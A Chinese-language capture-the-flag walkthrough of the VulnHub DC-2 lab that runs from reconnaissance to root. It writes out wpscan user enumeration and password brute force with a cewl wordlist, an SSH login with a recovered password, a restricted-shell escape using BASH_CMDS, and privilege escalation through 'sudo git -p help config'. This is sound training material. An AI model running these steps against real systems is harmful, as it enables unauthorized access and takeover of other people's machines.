vulnhub实战:DC-2
1.DC-2介绍
描述
与DC-1非常相似,DC-2是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。
与原始DC-1一样,它在设计时考虑了初学者的需求。
Linux技能和对Linux命令行的熟悉程度是必须的,基本的渗透测试工具的一些经验也是必须的。
就像DC-1一样,有五个标志,包括最后一个标志。
同样,就像DC-1一样,标志对初学者很重要,但对那些有经验的人来说并不那么重要。
简而言之,唯一真正重要的标志是最后一面旗帜。
对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。
我还没有探索实现root的所有方法,因为我放弃了我一直在研究的先前版本,并且除了基本操作系统安装之外,完全重新开
技术资料
DC-2 是一个基于 Debian 32 位构建的 VirtualBox VM,因此在大多数 PC 上运行它应该没有问题。
虽然我还没有在VMware环境中对其进行过测试,但它也应该可以正常工作。
它当前已针对桥接网络进行了配置,但是,可以对其进行更改以满足您的要求。为 DHCP 配置了网络。
安装很简单 - 下载它,解压缩它,然后将其导入VirtualBox,然后就可以走了。
请注意,您需要将渗透测试设备上的 hosts 文件设置为如下:
192.168.0.145 dc-2
显然,将 192.168.0.145 替换为 DC-2 的实际 IP 地址。
它将使生活变得更加简单(如果没有它,某个CMS可能无法正常工作)
2.安装部署
下载链接:
https://download.vulnhub.com/dc/DC-2.zip
下载之后使用VMware打开该文件,打开结果,设置为Net模式
3.信息收集
1.扫描此IP段中存活的靶机IP
arp-scan -l
发现靶场ip:192.168.241.132
2.端口扫描
nmap -A -p- -T4 192.168.1.1 #详细扫描
发现打开了80端口,开启了web服务
于是访问该ip,发现自动跳转http://www.dc-2.com/
,
再联想到该靶场介绍配置本地DNS解析,在host文件添加
192.168.241.132 dc-2 //C:\Windows\System32\drivers\etc
再次访问,发现flag
点击看到flag1
提示:登录以查看下一个标志,使用cewl密码攻击工具
3.进行目录探测
使用dirsearch工具:
4.进行cms识别
识别为WordPress4.7.10,在漏洞库可以发现存在许多漏洞
4.开始渗透
flag2
根据提示使用cewl生成密码字典(kail自带该工具)
cewl http://dc-2/ -w dict.txt //保存在dict.txt中
使用wpscan对网站用户进行枚举爆破(kail自带)
WPScan是专门检查WordPress网站漏洞的工具,它可以全面检查wp网站的漏洞,例如插件,主题,备份文件等
wpscan --url http://dc-2/ --enumerate u
发现三个用户admin
,jerry
,tom
,保存到user.txt
接下来,我们来爆破账号密码
wpscan --url http://dc-2/ -U user.txt -P dict.txt
爆出两个账号密码
根据扫到的目录,进入登录页面
http://dc-2/wp-admin/
发现flag2,
提示找另一个切入点,
flag3
由于端口扫描时发现了ssh,改了端口为7744,于是尝试使用ssh登录
发现Jerry登录不了,而tom可以登录
ssh -p 7744 [email protected]
parturient
发现flag3
flag4
提示了su和jerry
于是进行提权
BASH_CMDS[a]=/bin/sh;a //变量给a
/bin/bash //将命令给它就可以了
export PATH=$PATH:/bin/ //导入环境变量
export PATH=$PATH:/usr/bin //导入环境变量
进入/home/jerry
,可以看到flag4
flag5
提示git,于是进行提权
sudo git -p help config
!/bin/bash
进入root根目录,发现最后一个flag,